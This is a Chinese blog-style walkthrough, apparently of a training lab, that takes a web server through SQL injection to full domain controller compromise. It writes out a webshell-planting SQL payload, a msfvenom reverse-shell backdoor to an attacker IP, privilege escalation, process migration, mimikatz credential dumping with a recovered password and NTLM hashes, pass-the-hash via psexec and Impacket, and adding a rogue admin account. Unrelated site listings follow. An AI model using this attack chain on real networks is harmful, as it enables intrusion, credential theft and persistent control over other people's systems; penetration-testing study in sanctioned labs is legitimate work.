msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • qq群seo广告群发(qq群广告群发软件)

    QQ群/Q群SEO是什么?简单来说,就是 搜索优化 QQ群关键词排名靠前。这个并不是什么新鲜词汇或方法,10年前就有人做了,前些年很疯狂,那时候比现在也简单,甚至3年前腾讯官方110公号还特意发过,如图:     看完上图,你应该大体知道什么是QQ群SEO了吧。其实,同时也说明,腾讯并不是不知道某度的SEO,甚至自称“小某度”。直到现在微…

    2022-01-17 投稿
  • 女装代卖供货商(女装货源厂家直销)

    无论是女装实体店还是线上女装店,想要业绩好那么就得找到物美价廉的货源,对于女装店进货来说女装厂家货源是最好的渠道,厂家直销的货品必定是一手货源,无论在价格上还是在品质上都具有优势。那么女装厂家货源都从哪里找呢?女装店老板从哪里可以找到女装一手货源呢?今天我们就来看看哪里有女装厂家一手货源吧。 女装厂家货源都从哪里找   1、服装批发市场的厂家档口   服装批…

    2021-11-30
  • 镁矿上市公司储量排名(中国最大的镁矿上市公司)

    中国矿产资源丰富,有不少矿产都只有中国才有储备,曾经像稀土等产品一度成为西方工业发展的重要交易资源,如今镁金属也成了欧美地区新的高需求产品,中国要如何合理利用这类产品的优势呢? 工业的发展需要各种各样的金属产品,而镁金属凭借自身的性能成了各国争相求购的产品之一,无独有偶,中国正是镁金属的产出大国。 镁金属这类银白色的矿产,具有较好的延展性,可以打造成各种各样…

    2022-01-21 投稿
  • 阿里巴巴股票市值是多少(阿里巴巴上市股价是多少钱)

    11月18日,阿里巴巴集团发布2022财年第二季度财报,当季收入2006.9亿元人民币(下均为人民币),同比增长29%;经营利润为150.06亿元、同比增长10%;经调整净利润285.2亿元、同比下降39%。业绩公布后,阿里巴巴美股股价开盘跌超9%,截至收盘,阿里股价跌幅为11.13%。 截至2021年9月30日,阿里巴巴生态体系的全球年度活跃消费者达到约1…

    投稿 2021-11-19
  • 免费下载快速赚钱极速版(快手极速版赚钱)

    北快手,南抖音,短视频里两巨头。这两个巨头一直称霸着短视频软件的天下。最近他们都推出了极速版赚钱的软件,那么抖音极速版和快手极速版哪个挣钱多?谁更赚钱呢?让我们来对比一下。 抖音极速版和快手极速版赚钱效率对比 下载快手极速版填入邀请码:241626355 点击链接扫码下载:  点击扫码 有机会领取56元现金红包 一、新人用户奖励。 快手给我的新人奖励只有0.…

    2022-01-03
  • 猪肝先用水煮在炒可以吗,猪肝要不要用水煮过再炒

    虽然夏季人的口味偏清淡,但是只吃蔬菜、又会觉得过于寡淡,想来点荤的解解馋。可能一说到荤、大家首先想到的就是猪肉,其实除了猪肉、猪身上还有很多很有营养的部位、例如猪肝。它富含丰富的维生素和铁元素,是优良的补血食材,对于环节视疲劳、滋养皮肤都有很好的效果。   今天,就给大家分享一下青椒炒猪肝的正确做法,掌握好腌制以及焯水的技巧,保证你炒的猪肝再也不会…

    2022-03-17 投稿
  • wow帝国秘史 ,帝国的诅咒纣王与妲己秘史

    收到北京寄来的厚书:鹏鸣的小说《帝国的诅咒:纣王和妲己的秘史》,这是一本大开本620页的历史小说。版权页上说有95万字。已经85岁的我,用了两三月工夫才读完它。因为年纪大了,读了后面,忘了前面,最后干脆从头记记笔记,才算有了完整的印象,可以谈点浅见了。 诗人鹏鸣,写过上万首诗歌,也写报告文学;他写小说不知道是不是第一次?由此,我想起普希金(有人特别忌讳这句话…

    2023-06-20
  • 第一眼就吸引人的图片(特别吸引人的图片)

    目前,各类型的手机摄影比赛众多 参赛作品的内容题材也是繁多 要想从中脱颖而出 成为闪亮的“星” 必定是要有别于他人 那么,什么样的照片更容易 打动比赛的评委老师 并且获得众人的青睐呢?   事实上 那些打动人的照片都具有一定的特点 今天,我结合往届MPC手机摄影大赛 部分优秀晋级、获奖作品 整理了一套拍摄思路 希望对你今后参赛会有所帮助 01. &…

    2021-12-26 投稿
  • 暗影牧师雕文,80死亡骑士pve天赋加点

    魔兽怀旧服开启80级之后,将会新增一个英雄职业:死亡骑士,简称DK。这个职业是80级唯一的双战斗资源职业,技能循环最复杂,与之对应的就是输出能力超强,从P1阶段开始到最后结束,DK一直都是T0职业的有力竞争者。 今天我们就先来讲一下80级邪DK的全攻略,后续我还会讲冰DK和血DK。 先来讲一下邪DK的天赋,我推荐选择3-17-51的天赋点法。如果是喜欢玩双持…

    2023-07-05
  • 微信群发但不建群(微信怎么群发信息而不是建群)

    大家用了这么多年的微信了,除了聊天、刷朋友圈,你知道还有哪些实用功能吗?下面分享7个你不知道的微信冷知识,实用又强大,手把手教你玩转微信。   01*正确转发微信语音 微信语音是不能直接被转发的,正确的方法是长按语音消息,点击「多选」,然后勾选你需要转发的语音,在底部点击“正方体”图标。   接下来打开微信收藏功能,可以看到语音保存在这里…

    2021-12-02 投稿
  • 北京华夏幸福基业(华夏幸福基业广告)

    中证智能财讯 华夏幸福(600340)10月29日披露2022年第三季度报告。2022年前三季度,公司实现营业总收入219.80亿元,同比下降22.67%;归母净利润亏损15.60亿元,上年同期亏损134.56亿元;扣非净利润亏损93.66亿元,上年同期亏损133.01亿元;经营活动产生的现金流量净额为16.76亿元,上年同期为-48.93亿元;报告期内,华…

    2023-06-01
  • 中科院辟谣光刻机(中科院辟谣光刻机11纳米)

    近日,有关“新型5nm超高精度激光光刻加工方法”论文的通讯作者、中科院研究员、博士生导师刘前在接受媒体采访时澄清,这一技术与高端光刻机采用的极紫外光刻技术(EUV)是两回事。     今年7月,中科院网站刊登了一则国产5nm光刻技术获突破的新闻,中科院苏州纳米技术与纳米仿生研究所张子旸研究员,与国家纳米科学中心刘前研究员合作,在《纳米外报…

    2022-01-21